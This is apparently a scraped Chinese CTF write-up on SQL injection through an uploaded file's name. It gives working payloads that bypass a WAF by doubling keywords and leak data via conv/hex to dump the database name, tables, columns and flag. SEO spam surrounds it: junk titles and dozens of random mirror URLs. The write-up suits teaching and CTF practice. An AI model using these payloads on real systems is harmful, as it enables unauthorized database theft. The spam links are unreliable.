当前位置: 首页 > wzjs >正文

whois查询 站长工具建立簇状柱形图怎么设置

whois查询 站长工具,建立簇状柱形图怎么设置,wordpress留言本,怎么申请公司网站首先看首页登录框就猜测是功能型的漏洞,先注册一个账号进去看看 发现可以进行文件上传,jpg类的可以被上传,上传后的文件名会显示在页面内,这个地方应该和数据库进行连接了,在数据库中搜索得到了我上传的两个文件名&…

首先看首页登录框就猜测是功能型的漏洞,先注册一个账号进去看看

发现可以进行文件上传,jpg类的可以被上传,上传后的文件名会显示在页面内,这个地方应该和数据库进行连接了,在数据库中搜索得到了我上传的两个文件名,然后回显到该页面上,也许这个地方可以尝试sql注入?接下来再看看:

发现sql注入被检测到了,接下来看黑名单和绕waf,fuzz试一下:

前面长度为676的基本都被过滤掉了,发现anandd的响应包结果如下:

说明可以通过双写绕过,但现在的测试只是在看过滤,还得看一下sql语句或函数能不能使用:

使用 '+md5(123)+'进行拼接字符,类似这样的效果:test' + md5(123) + '.jpg

然后查看有没有执行成功的话,需要在浏览器页面中进行查看(我猜测这里可能是后端sql注入并没有执行,导致响应包没有返回正常的结果,而js通过API调用了数据库函数,才能够正常执行sql

注入):

md5(123)的值为:
 

说明这里出现了字母就把后面的全部截断掉?而要得到完整的信息就得想办法把结果都表现为数字,采用十进制的方式,这里应该是将16进制转换为10进制,才能防止其自动截断丢失信息。

CONV:CONV(test,16,10)可以将十六进制转换为十进制,以此来防止信息的丢失

 payload

用到的网站为:

10进制转16进制:进制转换 - 在线工具

16进制转字符:16进制转换,16进制转换文本字符串,在线16进制转换 | 在线工具

# 爆库 如果不用substr同样会导致超出范围信息缺失:出现1e的情况
' +(seleselectct conv(substr(hex(dAtabase()),1,12),16,10))+ '.jpg
' +(seleselectct conv(substr(hex(dAtabase()),13,12),16,10))+ '.jpg
# 得到131277325825392 -> 7765625f7570 -> web_up
# 1819238756 -> 6c6f6164 ->load
# 数据库名为:web_upload# 爆表:from 被过滤
' +(selecselectt conv(substr(hex((selecselectt group_concat(table_name)frofromm information_schema.tables where table_schema='web_upload')),1,12),16,10))+' .jpg
# files,hello_flag_is_here# 爆列名:and被过滤
' +(selecselectt conv(substr(hex((selecselectt group_concat(column_name)frofromm information_schema.columns where table_schema='web_upload' anandd table_name='hello_flag_is_here')),1,12),16,10))+' .jpg
# i_am_flag# 爆值
' +(selecselectt conv(substr(hex((seleselectct i_am_flag frfromom hello_flag_is_here)),1,12),16,10))+ '.jpg
# !!_@m_Th.e_F!lag

 

 

 

 


文章转载自:

http://zZbkHkMC.ntzbr.cn
http://G03QFn9T.ntzbr.cn
http://2rFyVUXm.ntzbr.cn
http://8EpsikWL.ntzbr.cn
http://Foq3rEUw.ntzbr.cn
http://SQ3Iv0XS.ntzbr.cn
http://l5A8sE84.ntzbr.cn
http://dnhXapjO.ntzbr.cn
http://UWEb3qCN.ntzbr.cn
http://E2tRAk15.ntzbr.cn
http://CU6jlYmw.ntzbr.cn
http://D3sxZk4t.ntzbr.cn
http://uvyQKvEq.ntzbr.cn
http://HhQncbNc.ntzbr.cn
http://m7rf3X9R.ntzbr.cn
http://gcAbbDpT.ntzbr.cn
http://JxFhsHsu.ntzbr.cn
http://8A5zdVai.ntzbr.cn
http://nwSGIrVY.ntzbr.cn
http://yn9priRx.ntzbr.cn
http://ZmwGbbFR.ntzbr.cn
http://7It3C5eF.ntzbr.cn
http://BWDncTWW.ntzbr.cn
http://NNWCcUdd.ntzbr.cn
http://TiNF5pko.ntzbr.cn
http://KTXOoLFr.ntzbr.cn
http://2W14zPdi.ntzbr.cn
http://FJwZGk9H.ntzbr.cn
http://tRcidsl4.ntzbr.cn
http://9tpinO7R.ntzbr.cn
http://www.dtcms.com/wzjs/620307.html

相关文章:

  • 石家庄市桥西区建设局网站北京网站建设58
  • 杭州高端网站建设公司360搜索引擎优化
  • 济南制作网站公司哪家好网店的网站设计方案
  • discuz品牌空间网站招标网官网入口
  • 网站seo在线诊断分析外链推广网站都有哪些
  • 网站整体设计风格028网站建设
  • 佛山企业网站制作建设银行新乡分行城南支行网站
  • 标题制作网站做网站的公司叫什么名字好
  • 要如何做才能拥有自己的网站呢网站防止攻击
  • 安丘市住房和城乡建设局网站wordpress论坛系统
  • 做网站平台成本qq登录网站怎么做
  • 微网站开发策划iis网站属性没有asp.net
  • 网站建设和托管哪家好建设网站的目的以及意义
  • 网站制作价格和流程做网站用到什么技术
  • 网页设计和网站建设实战大全网站关键词互点
  • 成都市网站建设服务商做网站项目需求分析是什么
  • 宝塔怎么做两个网站的解析台州网站制作开发
  • 大连网站建设哪家好短视频制作培训班
  • 怎么做自己的html网站wordpress数据库编码选择
  • h5页面怎么生成链接河南网站seo推广
  • 自助建站系统厂家visio做网站效果
  • 登录建设部网站大连住房和城乡建设官网
  • python做后台网站的多吗通州区建设局网站
  • wordpress建站博客高端建设网站公司哪家好
  • 网站广告条素材如何做国外的电商网站设计
  • 厦门建设银行网站萝岗网站建设制作
  • 百度录入网站制作一个收费网站要多少钱
  • php网站开发 知乎wordpress08模板
  • 创建网站的目的百度指数网址是什么
  • 网站建设样板wordpress 华为云